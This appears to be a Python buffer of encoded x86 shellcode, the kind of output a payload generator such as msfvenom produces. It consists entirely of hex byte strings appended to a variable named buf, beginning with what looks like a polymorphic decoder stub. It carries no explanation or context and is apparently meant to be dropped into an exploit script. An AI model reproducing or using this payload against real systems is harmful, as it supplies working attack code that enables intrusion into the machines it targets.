buf =  b""
buf += b"\xda\xd2\xba\x98\xb5\xf1\xe1\xd9\x74\x24\xf4\x5e\x29"
buf += b"\xc9\xb1\x52\x31\x56\x17\x03\x56\x17\x83\x5e\xb1\x13"
buf += b"\x14\xa2\x52\x51\xd7\x5a\xa3\x36\x51\xbf\x92\x76\x05"
buf += b"\xb4\x85\x46\x4d\x98\x29\x2c\x03\x08\xb9\x40\x8c\x3f"
buf += b"\x0a\xee\xea\x0e\x8b\x43\xce\x11\x0f\x9e\x03\xf1\x2e"
buf += b"\x51\x56\xf0\x77\x8c\x9b\xa0\x20\xda\x0e\x54\x44\x96"
buf += b"\x92\xdf\x16\x36\x93\x3c\xee\x39\xb2\x93\x64\x60\x14"
buf += b"\x12\xa8\x18\x1d\x0c\xad\x25\xd7\xa7\x05\xd1\xe6\x61"
buf += b"\x54\x1a\x44\x4c\x58\xe9\x94\x89\x5f\x12\xe3\xe3\xa3"
buf += b"\xaf\xf4\x30\xd9\x6b\x70\xa2\x79\xff\x22\x0e\x7b\x2c"
buf += b"\xb4\xc5\x77\x99\xb2\x81\x9b\x1c\x16\xba\xa0\x95\x99"
buf += b"\x6c\x21\xed\xbd\xa8\x69\xb5\xdc\xe9\xd7\x18\xe0\xe9"
buf += b"\xb7\xc5\x44\x62\x55\x11\xf5\x29\x32\xd6\x34\xd1\xc2"
buf += b"\x70\x4e\xa2\xf0\xdf\xe4\x2c\xb9\xa8\x22\xab\xbe\x82"
buf += b"\x93\x23\x41\x2d\xe4\x6a\x86\x79\xb4\x04\x2f\x02\x5f"
buf += b"\xd4\xd0\xd7\xf0\x84\x7e\x88\xb0\x74\x3f\x78\x59\x9e"
buf += b"\xb0\xa7\x79\xa1\x1a\xc0\x10\x58\xcd\x2f\x4c\x18\xbd"
buf += b"\xd8\x8f\xdc\xac\x45\x19\x3a\xa4\x65\x4f\x95\x51\x1f"
buf += b"\xca\x6d\xc3\xe0\xc0\x08\xc3\x6b\xe7\xed\x8a\x9b\x82"
buf += b"\xfd\x7b\x6c\xd9\x5f\x2d\x73\xf7\xf7\xb1\xe6\x9c\x07"
buf += b"\xbf\x1a\x0b\x50\xe8\xed\x42\x34\x04\x57\xfd\x2a\xd5"
buf += b"\x01\xc6\xee\x02\xf2\xc9\xef\xc7\x4e\xee\xff\x11\x4e"
buf += b"\xaa\xab\xcd\x19\x64\x05\xa8\xf3\xc6\xff\x62\xaf\x80"
buf += b"\x97\xf3\x83\x12\xe1\xfb\xc9\xe4\x0d\x4d\xa4\xb0\x32"
buf += b"\x62\x20\x35\x4b\x9e\xd0\xba\x86\x1a\xf0\x58\x02\x57"
buf += b"\x99\xc4\xc7\xda\xc4\xf6\x32\x18\xf1\x74\xb6\xe1\x06"
buf += b"\x64\xb3\xe4\x43\x22\x28\x95\xdc\xc7\x4e\x0a\xdc\xcd"
